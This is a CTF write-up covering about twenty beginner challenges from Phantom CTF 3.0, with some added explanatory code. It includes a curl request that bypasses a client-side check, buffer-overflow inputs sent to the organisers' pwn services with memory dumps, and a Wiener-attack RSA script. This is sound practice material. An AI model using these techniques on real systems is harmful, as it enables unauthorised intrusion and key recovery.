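This CTF was held from 2020/8/21 18:30 (JST) to 2020/8/22 14:30 (JST).
I took part as part of a team again this time. We finished with 4146 points, 29th out of 146 teams.
I am writing up the challenges I solved myself.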
Base64 ;) (Web)
A jwt file is attached. Decode it at https://jwt.io/.
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "id": 34,
  "username": "admin",
  "password": "pCTF{jwt_t0k3ns_ar3_gr3}",
  "iat": 1596844412
}
pCTF{jwt_t0k3ns_ar3_gr3}
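Added example (Python 3, not part of the original write-up): the header and payload of a JWT are only base64url-encoded, so anyone holding the token can read the claims without the HMAC key, and the decode can be done locally. The token is constructed here from the claims shown above with a made-up key; `read_claims`, `exposed_claims` and the `SENSITIVE` list are names and values assumed for this example.

```python
import base64
import hashlib
import hmac
import json

# Claim names worth flagging when they show up in a token (assumed list).
SENSITIVE = {"password", "passwd", "secret", "api_key"}


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment):
    # JWT strips the base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_hs256_token(header, payload, key):
    """Build a signed token so the example has something to decode."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def read_claims(token):
    """Decode header and payload WITHOUT the key; the signature is not checked."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def exposed_claims(payload):
    """Names of claims that should never travel in a readable token."""
    return sorted(k for k in payload if k.lower() in SENSITIVE)


# Constructed token: claims copied from the decoded output above, key made up here.
TOKEN = make_hs256_token(
    {"alg": "HS256", "typ": "JWT"},
    {"id": 34, "username": "admin",
     "password": "pCTF{jwt_t0k3ns_ar3_gr3}", "iat": 1596844412},
    b"constructed-demo-key",
)

if __name__ == "__main__":
    header, payload = read_claims(TOKEN)
    print(header)
    print(payload)
    print("readable without the key:", exposed_claims(payload))
```

The HS256 signature only protects integrity; it does nothing for the confidentiality of the claims.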
Koment (Web)
Looking at the HTML source, the flag was written in a comment.
<!-- Don't forget to see comments here's your flag pCTF{C00m3nts_4r3_ev3rywh3re}-->
pCTF{C00m3nts_4r3_ev3rywh3re}
Break It (Web)
I want to choose Yes, but only No can be clicked, so I send "yes" with curl.
$ curl -d 'flag=yes' http://webchallenge.cybsec.in:9000/get_flag
<html>
<head>
<title>almost there</title>
</head>
<body style="color:white;">
Almost there, Nice, client side security is weak! Now instead of saying "yes" or "no", say "hacker"<br><br>
</body>
</html>
Next, send "hacker".
$ curl -d 'flag=hacker' http://webchallenge.cybsec.in:9000/get_flag
pCTF{cyb3rc0ps_pl4n_d1d_n0t_w0rk}
pCTF{cyb3rc0ps_pl4n_d1d_n0t_w0rk}
Eclipse (Forensics)
$ file Eclipse.txt
Eclipse.txt: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 680x512, frames 3
Change the extension to jpg and open it.
A row of binary numbers is shown.
01110000 01100011 01110100 01100110 01111011 00110001 01110100 00100111 00110101 01011111 01100100 00110100 01110010 01101011 01111101
Decode the binary.
# Python 2
codes = '01110000 01100011 01110100 01100110 01111011 00110001 01110100 00100111 00110101 01011111 01100100 00110100 01110010 01101011 01111101'
codes = codes.split(' ')

# Each group is one 8-bit ASCII code
flag = ''
for code in codes:
    flag += chr(int(code, 2))
print flag
The output is as follows.
pctf{1t'5_d4rk}
pCTF{1t'5_d4rk}
Jiffy (Forensics)
Looking at the header, it reads LOL89a. Fix it to GIF89a and open the file as an image.
It is an animated GIF, so concatenating the strings shown in the frame images in order gives the flag.
pctf{TH15_W45_EA5Y_BRE45Y}
pCTF{TH15_W45_EA5Y_BRE45Y}
Kirit0 (Forensics)
$ exiftool kirit0.jpeg
ExifTool Version Number : 10.10
File Name : kirit0.jpeg
Directory : .
File Size : 16 kB
File Modification Date/Time : 2020:08:21 23:10:16+09:00
File Access Date/Time : 2020:08:21 23:21:18+09:00
File Inode Change Date/Time : 2020:08:21 23:10:16+09:00
File Permissions : rwxrwxrwx
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
X Resolution : 1
Y Resolution : 1
Resolution Unit : None
Y Cb Cr Positioning : Centered
Compression : JPEG (old-style)
Thumbnail Offset : 202
Thumbnail Length : 4001
Image Width : 183
Image Height : 275
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 183x275
Megapixels : 0.050
Thumbnail Image : (Binary data 4001 bytes, use -b option to extract)
Extract the thumbnail.
$ exiftool -b kirit0.jpeg > thumbnail.jpg
Remove the junk at the head of thumbnail.jpg and open it as an image file.
pCTF{W3_411_l0v3_th3_8l4ck_Sw0rdsM4n}
$root (OSINT)
Searching for "$root of cybsec" turns up the following page.
https://aakash-kumar.me/
Looking at the about page, the flag was written there.
pCTF{1_4m_r00t}
Entrance - BankHeist (Pwn)
It is enough to overwrite the value of notsecret with arbitrary data so that it becomes different.
The memory state is displayed, which makes it easy to follow. Enter an arbitrary 61 bytes.
$ nc pwnchallenge.cybsec.in 1337
Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret
0x7ffdfd384cb0 | 00 00 00 00 00 00 00 00 |
0x7ffdfd384cb8 | 00 00 00 00 00 00 00 00 |
0x7ffdfd384cc0 | 00 00 00 00 00 00 00 00 |
0x7ffdfd384cc8 | 00 00 00 00 00 00 00 00 |
0x7ffdfd384cd0 | ff ff ff ff ff ff ff ff |
0x7ffdfd384cd8 | ff ff ff ff ff ff ff ff |
0x7ffdfd384ce0 | 00 00 00 00 00 00 00 00 |
0x7ffdfd384ce8 | ef be ad de 00 ff ff ff |
0x7ffdfd384cf0 | 00 4d 38 fd fd 7f 00 00 |
0x7ffdfd384cf8 | 14 83 49 6b 76 55 00 00 |
Input your text: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret
0x7ffdfd384cb0 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384cb8 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384cc0 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384cc8 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384cd0 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384cd8 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384ce0 | 61 61 61 61 61 61 61 61 |
0x7ffdfd384ce8 | 61 61 61 61 61 00 ff ff |
0x7ffdfd384cf0 | 00 4d 38 fd fd 7f 00 00 |
0x7ffdfd384cf8 | 14 83 49 6b 76 55 00 00 |
Uhmm... door breaked due to overflow.
pCTF{L0ck3r_D00r_br34k3d}
pCTF{L0ck3r_D00r_br34k3d}
Logs (Web)
Look at http://webchallenge.cybsec.in:8080/assets/js/customjs.js.
c=[112,67,84,70,123,106,52,118,52,115,99,114,49,112,116,95,49,115,95,52,108,115,48,95,98,52,100,125];
var s = '';
for (var i = 0; i < c.length; i++) {
    s+=String.fromCharCode(c[i])
}
console.log(s);
Decode these ASCII codes.
# Python 2
codes = [112, 67, 84, 70, 123, 106, 52, 118, 52, 115, 99, 114, 49, 112, 116, 95, 49, 115, 95, 52, 108, 115, 48, 95, 98, 52, 100, 125]
flag = ''
for code in codes:
    flag += chr(code)
print flag
pCTF{j4v4scr1pt_1s_4ls0_b4d}
waSTEGate (Forensics)
$ file png.png
png.png: Zip archive data, at least v2.0 to extract
$ mv png.png png.zip
$ unzip png.zip
Archive: png.zip
creating: cd/
inflating: cd/cctv.jpeg
extracting: cd/flagishere.txt
$ steghide extract -sf cd/cctv.jpeg
Enter passphrase:
wrote extracted data to "notflag.txt".
$ cat notflag.txt
pCTF{cL4rk_1v4N_<3_$}
pCTF{cL4rk_1v4N_<3_$}
KEY :) (Forensics)
Filter on smtp and look at the TCP stream.
220 debian ESMTP Postfix (Debian/GNU)
mail from: sysadmin@sneakymailer.htb
250 2.1.0 Ok
rcpt to: airisatou@sneakymailer.htb
250 2.1.5 Ok
daa
502 5.5.2 Error: command not recognized
data
354 End data with <CR><LF>.<CR><LF>
-----BEGIN PGP PUBLIC KEY BLOCK-----
[...]
-----END PGP PUBLIC KEY BLOCK-----
......[silver@parrot]...[~/Desktop/Phantomctf3/smtpsniffer] ............
$cat priv.asc
-----BEGIN PGP PRIVATE KEY BLOCK-----
[...]
-----END PGP PRIVATE KEY BLOCK-----
Import the private key as secret.key.
$ gpg --import --allow-secret-key-import secret.key
gpg: 鍵リング「/home/ctf/.gnupg/secring.gpg」ができました
gpg: 鍵リング「/home/ctf/.gnupg/pubring.gpg」ができました
gpg: 鍵F4263647: 秘密鍵をインポートしました
gpg: /home/ctf/.gnupg/trustdb.gpg: 信用データベースができました
gpg: 鍵F4263647: 公開鍵"argenestel (pCTF{N0t_A_g00d_Plac3}) <heyhello@heyhello.weeb>"をインポートしました
gpg: 処理数の合計: 1
gpg: インポート: 1 (RSA: 1)
gpg: 秘密鍵の読み込み: 1
gpg: 秘密鍵のインポート: 1
pCTF{N0t_A_g00d_Plac3}
SherlocK (Crypto)
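Guessing that it is a Vigenere cipher, decrypt it at https://www.dcode.fr/vigenere-cipher. Adjust the key so that the plaintext starts with pCTF, and decrypt while guessing the rest. With the key PEPPER, the flag came out.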
pCTF{goodjobsherlock}
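Added example (Python 3, not from the original write-up): adjusting the key until the plaintext starts with pCTF is a known-plaintext calculation, key letter = ciphertext letter minus plaintext letter. The challenge ciphertext is not shown on this page, so the ciphertext here is constructed by encrypting the flag above with the key PEPPER; the guess list and all function names are made up for the example.

```python
import string

LETTERS = string.ascii_letters


def _shift(ch, k):
    base = ord("a") if ch.islower() else ord("A")
    return chr((ord(ch) - base + k) % 26 + base)


def vigenere(text, key, decrypt=False):
    """Vigenere over A-Z/a-z: case is kept, the key advances only on letters."""
    out, i = [], 0
    for ch in text:
        if ch in LETTERS:
            k = ord(key[i % len(key)].upper()) - ord("A")
            out.append(_shift(ch, -k if decrypt else k))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def key_from_crib(ciphertext, crib):
    """Key letters implied by a known plaintext prefix: key = cipher - plain."""
    c_letters = (c for c in ciphertext if c in LETTERS)
    p_letters = (p for p in crib if p in LETTERS)
    return "".join(
        chr((ord(c.upper()) - ord(p.upper())) % 26 + ord("A"))
        for c, p in zip(c_letters, p_letters)
    )


def consistent_keys(prefix, candidates):
    """Candidate keys whose repeated key stream starts with the recovered prefix."""
    keep = []
    for word in candidates:
        stream = (word * (len(prefix) // len(word) + 1))[: len(prefix)]
        if stream == prefix:
            keep.append(word)
    return keep


# Constructed ciphertext: the flag from this write-up encrypted with its key.
CIPHERTEXT = vigenere("pCTF{goodjobsherlock}", "PEPPER")
# Constructed guess list for the part of the key the crib does not cover.
GUESSES = ["PEP", "PAPER", "PEPPY", "PEPPER", "PEPSI"]

if __name__ == "__main__":
    prefix = key_from_crib(CIPHERTEXT, "pCTF{")
    print("ciphertext :", CIPHERTEXT)
    print("key prefix :", prefix)
    for key in consistent_keys(prefix, GUESSES):
        print(f"{key:<7}->", vigenere(CIPHERTEXT, key, decrypt=True))
```

The four-letter crib fixes only the first four key letters; several guesses survive that check, and only the readable decryption separates them.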
Sharkinthewire (Forensics)
Filter on smtp and look at the TCP stream.
220 debian ESMTP Postfix (Debian/GNU)
mail from: cyber@sneakymailer.htb
250 2.1.0 Ok
rcpt to: airisatou@sneakymailer.htb
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: Insecure SMTP
hey airisatou I want to inform you your password is pCTF{sh4rk_1n_th3_w1r3} just to remind you please change your password and don't send over smtp
.
250 2.0.0 Ok: queued as 365B5248C5
.[6~mail from: airisatou@sneakymailer.htb
502 5.5.2 Error: command not recognized
quit
221 2.0.0 Bye
pCTF{sh4rk_1n_th3_w1r3}
Segmentation Fault (Reverse Engineering)
Decompile it with Ghidra.
void print(void)
{
  undefined *puVar1;
  char *flg;
  char rb;
  char lb;
  char g;
  char a;
  char l;
  char f;

  puVar1 = (undefined *)malloc(0x15);
  *puVar1 = 0x77;
  puVar1[1] = 0x33;
  puVar1[2] = 99;
  puVar1[3] = 0x6f;
  puVar1[4] = 0x6e;
  puVar1[5] = 0x37;
  puVar1[6] = 0x72;
  puVar1[7] = 0x30;
  puVar1[8] = 0x6c;
  puVar1[9] = 0x74;
  puVar1[10] = 0x68;
  puVar1[0xb] = 0x33;
  puVar1[0xc] = 0x62;
  puVar1[0xd] = 0x31;
  puVar1[0xe] = 0x6e;
  puVar1[0xf] = 0x61;
  puVar1[0x10] = 0x72;
  puVar1[0x11] = 0x69;
  puVar1[0x12] = 0x33;
  puVar1[0x13] = 0x73;
  puVar1[0x14] = 0;
  printf("%c%c%c%c%c%s%c\n",0x70,0x43,0x54,0x46,0x7b,puVar1,0x7d);
  return;
}
Decode the ASCII codes.
# Python 2
# printf arguments in order: "pCTF{", the bytes written to puVar1, then "}"
codes = [0x70, 0x43, 0x54, 0x46, 0x7b, 0x77, 0x33, 99, 0x6f, 0x6e, 0x37, 0x72, 0x30, 0x6c, 0x74, 0x68, 0x33, 0x62, 0x31, 0x6e, 0x61, 0x72, 0x69, 0x33, 0x73, 0x7d]
flag = ''
for code in codes:
    flag += chr(code)
print flag
pCTF{w3con7r0lth3b1nari3s}
Locker - BankHeist (Pwn)
It is enough to overwrite secret with "flag".
The memory state is displayed, which makes it easy to follow. Enter an arbitrary 56 bytes followed by "flag".
$ nc pwnchallenge.cybsec.in 1338
Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret
0x7fff8f6e0400 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0408 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0410 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0418 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0420 | ff ff ff ff ff ff ff ff |
0x7fff8f6e0428 | ff ff ff ff ff ff ff ff |
0x7fff8f6e0430 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0438 | ef be ad de 00 ff ff ff |
0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 |
0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 |
Input some text: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag
Legend: buff MODIFIED padding MODIFIED notsecret MODIFIED secret MODIFIED CORRECT secret
0x7fff8f6e0400 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0408 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0410 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0418 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0420 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0428 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0430 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0438 | 66 6c 61 67 00 ff ff ff |
0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 |
0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 |
You did it! You breaked locker 2
pCTF{U_br34k3d_L0CK3R_c0ngr4ts}
pCTF{U_br34k3d_L0CK3R_c0ngr4ts}
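Added example (Python 3, not part of the original write-up) for both BankHeist challenges: it parses the before and after dumps of the Locker session and reports where the 0xdeadbeef marker sits and how far the write ran past the buffer, which is where the 56 filler bytes come from. The dump rows are copied from the session above; the 32-byte buffer length is an assumption read off the dump, and the function names are chosen here.

```python
import re

# "Before" and "after" dumps copied from the Locker session above.
BEFORE = """\
0x7fff8f6e0400 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0408 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0410 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0418 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0420 | ff ff ff ff ff ff ff ff |
0x7fff8f6e0428 | ff ff ff ff ff ff ff ff |
0x7fff8f6e0430 | 00 00 00 00 00 00 00 00 |
0x7fff8f6e0438 | ef be ad de 00 ff ff ff |
0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 |
0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 |
"""
AFTER = """\
0x7fff8f6e0400 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0408 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0410 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0418 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0420 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0428 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0430 | 61 61 61 61 61 61 61 61 |
0x7fff8f6e0438 | 66 6c 61 67 00 ff ff ff |
0x7fff8f6e0440 | 50 04 6e 8f ff 7f 00 00 |
0x7fff8f6e0448 | 44 33 84 c9 f2 55 00 00 |
"""
ROW = re.compile(r"^(0x[0-9a-f]+) \| ((?:[0-9a-f]{2} ){8})\|$")
BUF_LEN = 32  # assumption: buff is the 32 zero bytes before the ff padding


def parse_dump(text):
    """Return (base address, bytes) from the service's 8-bytes-per-row dump."""
    base, data = None, bytearray()
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        base = addr if base is None else base
        if addr != base + len(data):
            raise ValueError("dump rows are not contiguous")
        data += bytes.fromhex(m.group(2))
    return base, bytes(data)


def changed_span(before, after):
    """(first, one past last) offset whose byte differs, or None if identical."""
    diff = [i for i, (a, b) in enumerate(zip(before, after)) if a != b]
    return (diff[0], diff[-1] + 1) if diff else None


def bytes_past_buffer(span, buf_len):
    """How many modified bytes lie beyond a buffer of buf_len bytes."""
    return max(0, span[1] - buf_len) if span else 0


if __name__ == "__main__":
    base, before = parse_dump(BEFORE)
    _, after = parse_dump(AFTER)
    marker = before.find(bytes.fromhex("efbeadde"))
    span = changed_span(before, after)
    print(f"dump starts at {base:#x}, 0xdeadbeef marker at offset {marker}")
    print(f"modified offsets {span[0]}..{span[1] - 1}, "
          f"{bytes_past_buffer(span, BUF_LEN)} bytes past the {BUF_LEN}-byte buffer")
    print("bytes now at the marker:", after[marker:marker + 4])
```

A read limited to the buffer length would leave the overrun count at zero and the marker untouched.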
Secret (Reverse Engineering)
Decompile the pyc.
$ uncompyle6 s3cr3t.pyc
# uncompyle6 version 3.6.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.6.10 (default, Dec 19 2019, 23:04:32)
# [GCC 5.4.0 20160609]
# Embedded file name: source.py
# Size of source mod 2**32: 741 bytes

def kraitrot(input, d):
    Lf = input[0:d]
    Ls = input[d:]
    return Ls + Lf

def cobraverse(s):
    g = ''
    g += s[1::2]
    g += s[0::2]
    return g

def vipershift(s):
    g = ''
    for i in range(len(s)):
        a = hex(ord(s[i]) + 20)[2:]
        g += a
    return g

s3rc3t = input("Enter the secret to get access to python's cave : ")
if len(s3rc3t) < 28:
    print('Add little more weight :::\n')
else:
    if vipershift(cobraverse(kraitrot(s3rc3t, 15))) == '867387738d7c8284688f454745737c4488894784884491575a807a738787':
        print("\nWhy does Python live on land?\nBecause it's above C-level . XD!! \nCongrats for the flag anyways")
    else:
        print('Maybe a python bit you , better luck next time :((')
# okay decompiling s3cr3t.pyc
The transformation is as follows.
・Split at 15 bytes and swap the two parts.
・Concatenate the odd-indexed characters followed by the even-indexed characters.
・Add 20 to each ASCII code and convert to hexadecimal.
It is not a particularly difficult transformation, so I simply work backwards.
# Python 2
def rev_vipershift(s):
    # Two hex digits per character; undo the +20
    g = ''
    for i in range(0, len(s), 2):
        g += chr(int(s[i:i+2], 16) - 20)
    return g

def rev_cobraverse(s):
    # First half holds the odd-indexed characters, second half the even-indexed ones
    g = ''
    for i in range(len(s)//2):
        g += s[i + len(s)//2]
        g += s[i]
    return g

def rev_kraitrot(input, d):
    # Move the last d characters back to the front
    Lf = input[0:len(input) - d]
    Ls = input[len(input) - d:]
    return Ls + Lf

enc = '867387738d7c8284688f454745737c4488894784884491575a807a738787'
flag = rev_kraitrot(rev_cobraverse(rev_vipershift(enc)), 15)
print flag
pCTF{l1f3_1s_sh0rt_us3_pyth0n}
Welcome Note (Crypto)
https://www.pinterest.jp/pin/426364289721580301/
Decrypt using this Hylian-script conversion table as a reference.
CYBSEC W31C0ME5 YOU T0 TH3 PH4N7OM C7F 3.O
pCTF{CYBSEC_W31C0ME5_YOU_T0_TH3_PH4N7OM_C7F_3.O}
Irritate (Misc)
with open('irritate', 'r') as f:
    data = f.read()

while True:
    try:
        data = data.decode('base64')
    except:
        break

print data
pCTF{1s_it_5t1ll_h4ck4ble}
RSAXYZ (Crypto)
The value of e is large, so decrypt with the Wiener attack.
# Python 2 (relies on integer division with `/`)
from Crypto.PublicKey import RSA
from Crypto.Util.number import *
from fractions import Fraction

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

def decrypt(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    gcd, a, b = egcd(e, phi)
    d = a % phi  # egcd may return a negative coefficient; pow() needs d >= 0
    pt = pow(c, d, n)
    return hex(pt)[2:-1].decode('hex')

def continued_fractions(n,e):
    cf = [0]
    while e != 0:
        cf.append(int(n/e))
        N = n
        n = e
        e = N%e
    return cf

def calcKD(cf):
    # Convergents k/d of the continued fraction expansion
    kd = list()
    for i in range(1,len(cf)+1):
        tmp = Fraction(0)
        for j in cf[1:i][::-1]:
            tmp = 1/(tmp+j)
        kd.append((tmp.numerator,tmp.denominator))
    return kd

def int_sqrt(n):
    def f(prev):
        while True:
            m = (prev + n/prev)/2
            if m >= prev:
                return prev
            prev = m
    return f(n)

def calcPQ(a,b):
    # Solve x^2 - a*x + b = 0 for integer roots p, q
    if a*a < 4*b or a < 0:
        return None
    c = int_sqrt(a*a-4*b)
    p = (a + c) /2
    q = (a - c) /2
    if p + q == a and p * q == b:
        return (p,q)
    else:
        return None

def wiener(n,e):
    kd = calcKD(continued_fractions(n,e))
    for (k,d) in kd:
        if k == 0:
            continue
        if (e*d-1) % k != 0:
            continue
        phin = (e*d-1) / k
        if phin >= n:
            continue
        ans = calcPQ(n-phin+1,n)
        if ans is None:
            continue
        return (ans[0],ans[1])

with open('key.public', 'r') as f:
    pub_data = f.read()

pubkey = RSA.importKey(pub_data)
n = pubkey.n
e = pubkey.e

with open('ciphertext.bin', 'rb') as f:
    c = bytes_to_long(f.read())

p, q = wiener(n, e)
flag = decrypt(p, q, e, c)
print flag
The decrypted result is as follows.
{shorter_d_is_quicker_but_insecure}
pCTF{shorter_d_is_quicker_but_insecure}
Click ME (Android)
Look at it in Bytecode Viewer.
class MainActivity$1 implements OnClickListener {
   // $FF: synthetic field
   final MainActivity this$0;

   MainActivity$1(MainActivity var1) {
      this.this$0 = var1;
   }

   public void onClick(View var1) {
      MainActivity var2 = this.this$0;
      ++var2.count;
      this.this$0.atextview.setText("click it 10000 times for flag");
      if (this.this$0.count == 10000) {
         String var3 = new String(Base64.decode("cENURns3aHIwd180YVBwbDNfZnIwbV93MW5Eb1d9", 0), StandardCharsets.UTF_8);
         this.this$0.atextview.setText(var3);
      }
   }
}
$ echo cENURns3aHIwd180YVBwbDNfZnIwbV93MW5Eb1d9 | base64 -d
pCTF{7hr0w_4aPpl3_fr0m_w1nDoW}
pCTF{7hr0w_4aPpl3_fr0m_w1nDoW}
0 kb (Misc)
>dir /r
 ドライブ C のボリューム ラベルは S3A8244D001 です
 ボリューム シリアル番号は 50D2-38C8 です

 C:\CTF\work のディレクトリ

2020/08/22 11:56 <DIR> .
2020/08/22 11:56 <DIR> ..
2020/08/22 11:54 154 modibaba.rar
 149 modibaba.rar:Zone.Identifier:$DATA
2020/08/14 01:29 0 modibaba.txt
 30 modibaba.txt:hidden:$DATA
 2 個のファイル 154 バイト
 2 個のディレクトリ 593,076,920,320 バイトの空き領域
It contains an alternate data stream.
>more < modibaba.txt:hidden:$DATA
flag{baba_jika_thullu_flag}
flag{baba_jika_thullu_flag}